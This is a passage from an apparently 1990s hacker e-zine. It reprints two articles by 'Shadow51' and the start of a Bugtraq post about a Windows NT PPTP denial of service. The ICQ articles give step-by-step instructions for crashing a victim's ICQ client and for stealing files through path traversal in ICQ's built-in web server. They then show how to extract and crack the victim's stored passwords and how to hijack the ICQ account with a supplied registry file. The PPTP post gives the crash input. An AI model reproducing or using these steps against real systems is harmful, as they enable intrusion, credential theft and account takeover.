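        printf("%d  %-46s -> '%s'\n", verdict_for(samples[i]), samples[i], last_path);
    return 0;
}
```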
       
       @HWA
       
       
 12.1  ICQ Homepage Exploit
       ~~~~~~~~~~~~~~~~~~~~
 
 
       ICQ Homepage Exploit
       By Shadow51
       
       
       Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means
       they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely,
       and even download their files. The only problem is that you can't see the files, so you have to know what you're
       downloading. 
       
       To close the ICQ client: 
       
       1. Click on the start button 
       2. Click on RUN 
        3. Type Telnet 123.123.123.123 80. Of course, replace the 123.123.123.123 by the IP of the victim (note that this bug
        only works on build 1700 and maybe a few others, but I'm not sure). 
        4. Press ENTER. Wait until it connects. 
        5. Type QUIT. Wait about 10 seconds. If they go offline that means it worked; if not, then it didn't work. Now suppose
        you want to get some of their files. 
       
        Let's say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on: 
        
        1. Go to your browser 
        2. Type http://123.123.123.123/.html/......../windows/win.ini 
        Note that you need the /.html/ part. It will trick the server into believing it's an html file, and note that there are 8 dots
        /......../ (that means it goes back 4 dirs). If the user's ICQ dir is not in a standard place it can cause problems, but 95% of
        the time it's in c:\progra~1\icq\ 
        3. Press ENTER in your browser
       
        It will simply ask you where you want to save the file; then you save it and do whatever you want with it. Now this is not all
        you can do. There are much better things to do with this exploit, like getting the user's password files and registry. If you are a
        lamer, I suggest you go and play with what you just learned, and stop reading now 'cause this is a bit too complicated for
        you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user
        you're hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose
        you have Win98 and they have Win95; it won't work. An easy way to make sure it's the same version is to download
        their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this
        is a good one. 
       
        1. Get 2 files: http://123.123.123.123/.html/......../windows/user.dat and
        http://123.123.123.123/.html/......../windows/system.dat 
        Remember to change the IP when you're done. 
        2. Copy them into a directory. 
        3. Make a backup copy of your c:\windows\user.dat and c:\windows\system.dat. You're gonna want to have them back
        when you're done. 
       4. Restart your computer 
       5. Press F8 just before it boots up 
       6. Choose "Command Prompt Only" 
        7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked. 
       8. Reboot your computer
       9. Just before it boots, press F8 several times; choose safe mode.
       10. Once booted in safe mode, click on start 
       11. Click on RUN 
       12. Type regedit
       13. Press ENTER
       14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..."
       15. Save the file, then get yourself a Password Cracker
        16. If all goes well, you now have all the user's passwords.
       It should look something like this:
       
       crypt_Blizzard_Storm : A@N
       www.mircosoft.com : Administration:PASSWORD
       *Rna\Dan\dannyk : q34ad6gt
       *Rna\Test\957935 : nar8s7yj
       *Rna\Test2\wolves : cyal8r
       *Rna\Test3\curtisph : q73vnrht
       *Rna\My Connection\USERNAME : PASSWORD
       *Rna\My Connection 3\USERNAME : PASSWORD
       
       17. Reboot
       18. Press F8 at startup
       19. Choose "Command Prompt Only"
       20. Replace user.dat and system.dat with your originals that you previously had backed up
       
       Shadow51 
       29000000 
       Shadow51@writeme.com
       
       -----------------------------------------------------------------------------------------------------------------------
       
       ICQ Account Cracking
       By Shadow51
       
       
        A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it
        doesn't work every time. All you do is this: 
        1. Download the following files from the targeted user's hard drive using the ICQ exploit:
        (replace 123.123.123.123 by the guy's IP and UIN by the guy's ICQ #)
        (note that there are 6 dots, not 8)
       
       http://123.123.123.123/.html/....../db/UIN.idx
       http://123.123.123.123/.html/....../db/UIN.dat
       http://123.123.123.123/.html/....../db/UINmsg.dat
       http://123.123.123.123/.html/....../db/UINmsg.idx
       http://123.123.123.123/.html/....../db/UINhis.idx
       http://123.123.123.123/.html/....../db/UINhis.dat
       
       2. Open Notepad and create a new document.
        3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking.)
       (I got this registry key from http://i.am/devil)
       
       REGEDIT4
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN]
       "Name"="Hacked UIN"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs]
       "Random Groups Version"=dword:0000000a
       "Online Color"=dword:00ff0000
       "Unlisted Color"=dword:00800000
       "Offline Color"=dword:000000ff
       "Authorize Color"=dword:00400080
       "Notify Color"=dword:00800080
       "LastStatus Color"=dword:00008000
       "Default File Dir"="C:\\Program Files\\ICQ\\Received Files"
       "SMTP Address"=""
       "DND Message"="Please do not disturb me now. Disturb me later."
       "Out Message"=""
       "Busy Message"="User is occupied. Only urgent messages will be delivered."
       "Chat Message"="I would like to chat about anything"
       "Away PreNum"=dword:00000000
       "Out PreNum"=dword:00000000
       "Busy PreNum"=dword:00000000
       "DND PreNum"=dword:00000000
       "Chat PreNum"=dword:00000000
       "File Options"=dword:00000004
       "URL Options"=dword:00000004
       "Chat Options"=dword:00000004
       "All Options"=dword:0000000e
       "EXT Options"=dword:00000004
       "Startup"="No"
       "Auto Away"="No"
       "Auto Hide Time"=dword:0000001e
       "Auto Hide"="No"
       "Move Server Top"="No"
       "Blink In Tray"="No"
       "Sort Lists"="Yes"
       "Show Online List"="No"
       "Remove AddFriend"="Yes"
       "Splash Open"="Yes"
       "History Last First"="Yes"
       "FloatTop"="Yes"
       "Thru Server"="No"
       "Join Chat"="No"
       "Open URL Browser"="No"
       "Refuse File NotInList"="No"
       "Overwrite ExistFile"="No"
       "Disable Online Alert"="Yes"
       "Accept Urgent In Busy"="No"
       "Blink Tray In AwayBusy"="Yes"
       "Use Contact List Color"="No"
       "Contact List Color"=dword:00c8b99d
       "Save User File"="Yes"
       "Auto Update"="Yes"
       "Search Wizard"="No"
       "Default Mailer"="Yes"
       "Pop Play Sound"="Yes"
       "Pop Auto Launch"="No"
       "Pop Check"="No"
       "Pop Time"=dword:0000000a
       "Check Headers"="Yes"
       "MoveToOutDelay"=dword:00000014
       "MoveToOut"="No"
       "MoveToAwayDelay"=dword:0000000a
       "MoveToAway"="No"
       "Auto Sleep Mode"="No"
       "Log History Events"="Yes"
       "Connection Type"="Permanent"
       "Firewall"="Yes"
       "UseGivenIP"="No"
       "Socks"="No"
       "SocksPort"=dword:00000438
       "SocksServer"="Enter your socks server"
       "ProxySocks4Host"="Enter your proxy server"
       "ProxySocks4Port"=dword:00000438
       "UseProxySocks4"="No"
       "GiveStats"="No"
       "SocksVersion"=dword:00000004
       "SocksAuthentication"=dword:00000000
       "FirewallTimeout"=dword:0000001e
       "UseFirewallTimeout"="No"
       "UseFirewallRangePorts"="Yes"
       "FirewallFromPort"=dword:000059d8
       "FirewallToPort"=dword:00007148
       "Old Sockets"="No"
       "UserType"=dword:00000000
       "Mail Receipients"=";"
       "Random Available"="No"
       "RandomGroupName"=dword:00000001
       "Random Name"="#�d�� 666 �["
       "Allow Secure Clients Only"="Yes"
       "PhoneApproval"="Yes"
       "PhoneToneTime"=dword:00000032
       "PhonePauseTime"=dword:000001f4
       "PhoneBreakTime"=dword:00000028
       "PhoneSettings"=dword:00000001
       "PhonePauseChar"=","
       "PhoneLocalP"=" "
       "PhoneLongP"=" "
       "PhoneInterP"=" "
       "Chat RoomName"="Product Support / Suggestion"
       "Auto Join Chat Room"="Yes"
       "Novice Counter"=dword:0000000a
       "Menu Counter"=dword:00000013
       "Servers Version"=dword:00000001
       "Externals Version"=dword:00000019
       "Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
       00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
       "Novice"="No"
       "Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00
       "State Flags"=dword:00000000
       "Server Msg Version"=dword:0000000b
       "Server Msg Shown"=dword:00000001
       "Server Msg Count"=dword:00000009
       "LeftButton Warning"="No"
       "Menu Left Click"="No"
       "Tip Startup"="No"
       "Tip Position"=dword:00000000
       "MoreEvents Warning"="No"
       "Invisible Warning"="No"
       "Send Later Warning Off"="No"
       "Busy Warning"="No"
       "Away Warning"="No"
       "DND Warning"="No"
       "FT Warning"="No"
       "Ext Warning"="No"
       "Out Warning"="No"
       "Chat Warning"="No"
       "Away Message"="User is currently away\r\nYou can leave him/her a message"
        "Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth."
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets]
       "OutMsg Presets 0"="I'm out'a here. See you tomorrow!"
       "DNDMsg Presets 0"="Please do not disturb me now. Disturb me later."
       "Away PresetsMsg 0"="Away"
       "Out PresetsMsg 0"="Out for the day"
       "Busy PresetsMsg 0"="Busy"
       "DND PresetsMsg 0"="DND"
       "Chat PresetsMsg 0"="Chat"
       "AwayMsg Presets 1"="I am out to lunch. I will return shortly."
       "OutMsg Presets 1"=""
       "DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed."
       "ChatMsg Presets 1"="Come Join my chat room!"
       "Away PresetsMsg 1"="Lunch"
       "Out PresetsMsg 1"="Not here"
       "Busy PresetsMsg 1"="Meeting"
       "DND PresetsMsg 1"="Meeting"
       "Chat PresetsMsg 1"="Come In"
       "AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!"
       "OutMsg Presets 2"="I'm closed for the weekend/holidays."
       "DNDMsg Presets 2"="Don't disturb my concentration!"
       "ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!"
       "Away PresetsMsg 2"="Be right back"
       "Out PresetsMsg 2"="Closed"
       "Busy PresetsMsg 2"="Concentration"
       "DND PresetsMsg 2"="Concentration"
       "Chat PresetsMsg 2"="Fun"
       "AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished."
       "OutMsg Presets 3"="Gone fishin'."
       "DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!"
       "ChatMsg Presets 3"="What are you waiting for? Come on in!"
       "Away PresetsMsg 3"="Dog Walk"
       "Out PresetsMsg 3"="Fishing"
       "Busy PresetsMsg 3"="On the Phone"
       "DND PresetsMsg 3"="On the Phone"
       "Chat PresetsMsg 3"="Don't Wait"
       "AwayMsg Presets 4"="Went out for a smoke. "
       "OutMsg Presets 4"="I'm sleeping. Don't wake me."
       "DNDMsg Presets 4"="I can't chat with you now. I'm busy."
       "ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat."
       "Away PresetsMsg 4"="Smoke"
       "Out PresetsMsg 4"="Sleeping"
       "Busy PresetsMsg 4"="Can't chat "
       "DND PresetsMsg 4"="Can't chat "
       "Chat PresetsMsg 4"="Hear"
       "AwayMsg Presets 5"="On my Coffee break."
       "OutMsg Presets 5"="Went home. Had to feed the kids."
       "DNDMsg Presets 5"="Can't you see I'm working?"
       "ChatMsg Presets 5"="Enter your chat room message here"
       "Away PresetsMsg 5"="Coffee"
       "Out PresetsMsg 5"="Kids"
       "Busy PresetsMsg 5"="Working"
       "DND PresetsMsg 5"="Working"
       "Chat PresetsMsg 5"="Empty"
       "AwayMsg Presets 6"="Went to get some fresh air."
       "OutMsg Presets 6"="Gone for good."
       "DNDMsg Presets 6"="Enter your occupied message here"
       "ChatMsg Presets 6"="Enter your chat room message here"
       "Away PresetsMsg 6"="Air"
       "Out PresetsMsg 6"="Gone"
       "Busy PresetsMsg 6"="Conversing"
       "DND PresetsMsg 6"="Empty"
       "Chat PresetsMsg 6"="Empty"
       "BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered."
       "DNDMsg Presets 7"="Enter your occupied message here"
       "ChatMsg Presets 7"="Enter your chat room message here"
       "Away PresetsMsg 7"="Empty"
       "Out PresetsMsg 7"="Empty"
       "Busy PresetsMsg 7"="Empty"
       "DND PresetsMsg 7"="Empty"
       "Chat PresetsMsg 7"="Empty"
       "BusyMsg Presets 0"="User is currently Occupied"
       "ChatMsg Presets 0"="I would like to chat about anything"
       "BusyMsg Presets 1"="User is currently Occupied1"
       "BusyMsg Presets 2"="User is currently Occupied2"
       "BusyMsg Presets 3"="User is currently Occupied"
       "BusyMsg Presets 4"="User is currently Occupied"
       "BusyMsg Presets 5"="User is currently Occupied"
       "BusyMsg Presets 6"="User is currently Occupied"
       "AwayMsg Presets 7"="User is currently away"
       "OutMsg Presets 7"="User is currently N/A"
       "AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD]
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0]
       "Message"="Please bookmark our network status page."
       "URLName"="http://www.mirabilis.com/status.html"
       "URL"="press here"
       "Date"=""
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1]
       "URLName"="http://www.mirabilis.com/emailsig.html"
       "URL"="Go to the ICQ e-mail signature generator"
       "Date"=""
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2]
        "Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group - home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )"
       "URLName"="http://www.icq.com/announcements/02.html"
       "URL"="It's fun and easy, GO!!"
       "Date"="31-MAR-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3]
       "URLName"="http://www.icq.com/announcements/whitepages.html"
       "URL"="Go!"
       "Date"="1-APR-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4]
       "Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!"
       "URLName"="http://www.mirabilis.com/email.html"
       "URL"="E-mail notification instructions"
       "Date"="15-JUN-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5]
       "URLName"="http://www.icq.com/announcements/05.html"
       "URL"="Create your Greeting"
       "Date"="12-JUL-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6]
       "URLName"="http://www.icq.com/announcements/06.html"
       "URL"="Click For More Information"
       "Date"="26-AUG-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7]
       "Message"="ICQ can alert you when you receive Emails and show you the Email headers!"
       "URLName"="http://www.icq.com/announcements/07.html"
       "URL"="Learn how to do it"
       "Date"="06-SEPT-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8]
       "URLName"="http://www.icq.com/announcements/06.html"
       "URL"="Click For More Information"
       "Date"="20-OCT-98"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups]
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1]
       "Name"="General Chat"
       "Number"=dword:00000001
       "Version"=dword:00000001
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2]
       "Name"="Romance"
       "Number"=dword:00000002
       "Version"=dword:00000002
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3]
       "Name"="Games"
       "Number"=dword:00000003
       "Version"=dword:00000003
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4]
       "Name"="Students"
       "Number"=dword:00000004
       "Version"=dword:00000004
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5]
       "Name"="20 Something"
       "Number"=dword:00000006
       "Version"=dword:00000006
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6]
       "Name"="30 Something"
       "Number"=dword:00000007
       "Version"=dword:00000007
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7]
       "Name"="40 Something"
       "Number"=dword:00000008
       "Version"=dword:00000008
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8]
       "Name"="50 Plus"
       "Number"=dword:00000009
       "Version"=dword:00000009
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers]
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1]
       "Host"="icq1.mirabilis.com"
       "Port"=dword:00000fa0
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals]
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta]
       "Type"="Command"
       "Command Line"="/ip:"
       "Path"="C:\\Program Files\\Canasta\\Canasta.exe"
       "URL"="http://ourworld.compuserve.com/homepages/mharte"
       "Version"=dword:0000000f
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone]
       "Type"="Extension"
       "Format"="/p:tcp /ac:"
       "Extension"="cvp"
       "URL"="http://www.connectix.com/html/videophone.html"
       "Version"=dword:00000009
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme]
       "Type"="Command"
       "Command Line"=""
       "Path"="C:\\CUSEEME\\CUSEEM32.EXE"
       "URL"="http://www.cu-seeme.com/"
       "Version"=dword:00000006
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone]
       "Type"="Extension"
       "Format"=""
       "Extension"="iru"
       "URL"="http://irisphone.com/"
       "Version"=dword:0000000a
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat]
       "Type"="ServerExtension"
       "Format"="1.1\\n-u 1 -a "
       "Extension"="vce"
       "NumParameters"=dword:00000002
       "Server1"="vchat1.microsoft.com"
       "URL"="http://vchat1.microsoft.com"
       "Version"=dword:00000011
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1]
       "ParamName"="World"
       "CanOtherChange"="No"
       "Param1"="#Compass"
       "Param2"="#BugWorld"
       "Param3"="#Fishbowl"
       "Param4"="#Lodge"
       "Param5"="#Lunar"
       "Param6"="#Lodge"
       "Param7"="#Practice"
       "Param8"="#RedDen"
       "Param9"="#TableTop"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2]
       "ParamName"="Avatar"
       "CanOtherChange"="Yes"
       "Param1"="Amani"
       "Param2"="Anderson"
       "Param3"="Brb"
       "Param4"="Cat"
       "Param5"="Crab"
       "Param6"="Dancer"
       "Param7"="Dred"
       "Param8"="Duggan"
       "Param9"="Joey"
       "Param10"="Lulu"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk]
       "Type"="Command"
       "Command Line"=""
       "Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE"
       "URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html"
       "Version"=dword:00000004
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx]
       "Type"="ClientServer"
       "Client Command Line"="/CLIENT %i"
       "Server Command Line"="/SERVER"
       "Client Path"="C:\\Rikken\\Rikken.exe"
       "Server Path"="C:\\Rikken\\Rikken.exe"
       "URL"="http://www.dse.nl/~ramon/rikken/"
       "Version"=dword:00000017
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone]
       "Type"="Extension"
       "Format"="callto://"
       "Extension"="vdp"
       "URL"="http://www.vdo.net/download/"
       "Version"=dword:00000003
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall]
       "Type"="Command"
       "Command Line"=""
       "Path"="C:\\VidCall\\Corp.EXE"
       "URL"="http://www.access.digex.net/~vidcall/vidcall.html"
       "Version"=dword:00000008
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone]
       "Type"="Extension"
       "Format"=""
       "Extension"="wpc"
       "URL"="http://www.webphone.com/"
       "Version"=dword:00000007
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake]
       "Type"="ClientServer"
       "Client Command Line"="-mpath +connect %i"
       "Server Command Line"="-mpath -listen"
       "Client Path"="c:\\quake_sw\\Q95.bat"
       "Server Path"="c:\\quake_sw\\Q95.bat"
       "Server1"="quake.xmisson.com"
       "URL"="http://www.idsoftware.com"
       "Version"=dword:00000010
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat]
       "Type"="ServerCommand"
       "Format"="GROUPNAME=i PORT=15000"
       "Path"="C:\\Program Files\\VoxChat\\VoxChat.exe"
       "NumParameters"=dword:00000001
       "Server1"="voxchat1.voxware.com"
       "Server2"="voxcha2.voxware.com"
       "URL"="http://www.voxchat.com/low/download.htm"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1]
       "ParamName"="Room"
       "CanOtherChange"="No"
       "Param1"="#ICQ"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations]
       "LastUpdate"=dword:00000000
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main]
       "SelectedCell"=dword:00000000
       "AlwaysOnTop"="Yes"
       "LeftBarWidth"=dword:000000ad
       "RightBarWidth"=dword:000000ad
       "FloatBar-Left"=dword:00000255
       "FloatBar-Right"=dword:00000307
       "FloatBar-Top"=dword:00000033
       "FloatBar-Bottom"=dword:000001f3
       "State"="Floating"
       "Minimized"="No"
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows]
       "Response"=dword:008f00c9
       "SearchWiz"=dword:006f00c0
       "NotifyWiz"=dword:006f00c0
       "posNovice"=dword:009300dc
       "posMOTD"=dword:00af00b7
       "posMenuConfig"=dword:00a900e7
       "RemoveUIN"=dword:00bb0108
       "Message"=dword:008b004f
       "Security"=dword:007400b4
       "Prefs"=dword:007f00ae
       "History"=dword:0096003a
       "File Request"=dword:009000f0
       "FileTransfer"=dword:009700ae
       "Info"=dword:009300d2
       "FetchUser"=dword:00e9010e
       "URL Message"=dword:00a00069
       "Away"=dword:00bd00f7
       "Chat Request"=dword:009f00dd
       "Contacts List"=dword:008300bd
       "Chat"=dword:008b00f5
       "Phone"=dword:000a000a
       "Phone Call Request"=dword:007700e5
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search]
       "Place"=dword:00a400cc
       "Type"=dword:00000002
       "Width"=dword:01880188
       
       [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat]
       "ChatStyle Counter"=dword:00000003
       "Pen Color"=dword:0080ffff
       "Back Color"=dword:00004000
       "Send Focus"="Yes"
       "Enable Sounds"="Yes"
       "Name Bars"="Yes"
       "Always On Top"="No"
       "AutoColor"="No"
       "OverRide Format"="Yes"
       "Show Toolbar"="Yes"
       "State"=dword:00010000
       "New Font Name"="Times New Roman"
       "Char Set"=dword:00000000
       "IRCListWidth"=dword:00000006
       "Font Pitch"=dword:00000012
       "New Font Height"=dword:0000000e
       "Font Effects"=dword:00000000
       "AutoColor 0"=dword:00000000
       "AutoColor 1"=dword:00000080
       "AutoColor 2"=dword:00008000
       "AutoColor 3"=dword:00008080
       "AutoColor 4"=dword:00800000
       "AutoColor 5"=dword:00800080
       "AutoColor 6"=dword:00808000
       "AutoColor 7"=dword:00808080
       "AutoColor 8"=dword:00c0c0c0
       "AutoColor 9"=dword:000000ff
       "AutoColor 10"=dword:0000ff00
       "AutoColor 11"=dword:0000ffff
       "AutoColor 12"=dword:00ff0000
       "AutoColor 13"=dword:00ff00ff
       "AutoColor 14"=dword:00ffff00
       "AutoColor 15"=dword:00ffffff
       "Place-Left"=dword:0000000a
       "Place-Right"=dword:000001fe
       "Place-Top"=dword:0000000a
       "Place-Bottom"=dword:0000021a
       "New LogFile name"="ICQChatLog.txt"
       "New SaveFile name"="ICQChatSave.txt"
       
       4. Save the file as HACKEDICQ.REG
       5. If you have ICQ open, close it.
       6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory 
       ex: c:\progra~1\ICQ\db
       7. Open the HACKEDICQ.REG file
       8. When it asks if you would like to add this to your registry, click YES.
       9. Open the DB convert program in your ICQ directory (It comes with ICQ99), then click on "Convert a old DB"
       10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it
       manually.
        11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then
        click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there are two things that may have
        happened:
        
        I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK.
        II. They are still online. The only thing you can do is wait until they go offline.
        
        12. Once you are successfully in the user's ICQ, quickly change the user's password. Once this is complete, you will be in
        total control over the user's ICQ account. Mission success.
       
       ICQ Exploit Tips
       -----------------
       
       Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the
       Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys.
       
        I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so I went into NT and I tested it.
        The result was the system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server, it's 100%
        safe for you to do so.
       
       Shadow51
       29000000
       Shadow51@hackcity.com

       
       @HWA      
       
 13.0  Possible DoS in WinNT RAS (PPTP)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Possible DOS in WinNT RAS (PPTP)

       Simon Helson (simon@CONCEPTS.CO.NZ)
       Tue, 27 Apr 1999 09:29:06 -0700 
       
        Please excuse if this has been posted before; I did a quick search of the
        archives and found nothing.
        This hasn't been sent to MS, as I don't know an email address to send it
        to. Aleph, if you find it worthy of sending, please forward a copy to the
        MS people for their attention. Cheers.
       
        I was playing around with PPTP last night, and discovered that, with "very"
        minimal effort, I could cause my friend's NT Server (version 4, service pack
       4) to reboot instantly, without shutting down. All I did was telnet to the
       port (1723) on the NT box, and then send the following data.
       
       hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
       hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
       hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
       hhhhhhhhhhhhhhhhhhhhhhhhhhhh (that's 256 'h's for those who don't want to
       count :-)
       
        and hit return. Nothing. But then I hit ^D and all hell broke loose. The
        NT server dropped like a stone, full hardware reboot.
       
       I tested this multiple times and always got the same response.
       
       The NT Server was version 4, with Service pack 4 applied.
       
       Cheers
       
       Simon
       
       ------------------------------------------------------------------------------
       
       Date: Tue, 27 Apr 1999 20:55:50 -0700
       From: Simon Helson <simon@CONCEPTS.CO.NZ>
       To: BUGTRAQ@netspace.org
       Subject: RE Possible DOS in WinNT RAS (PPTP)
       
       Hello again.
       
        Please excuse the lack of detail in my first posting. I was trying to
        recollect the events of the past evening.
       
        Unfortunately I don't have unlimited access to an NT server to play with.
       However, I have tried this again (on the same server) this time over the
       internet as opposed to a LAN. (trying to remove the NIC from the equation.)
       
       Firstly, the NT setup:
       NT Server Version 4, with Service Pack 4.0 applied.
       (outside US version - only 40 bit)
       PPTP added as a network device
       Number of VPNs available - 2
       then RAS service started.
       
       The attack box setup:
       RedHat Linux 5.2 running kernel 2.2.1
       modem connection to the net
       
       The procedure I followed:
       
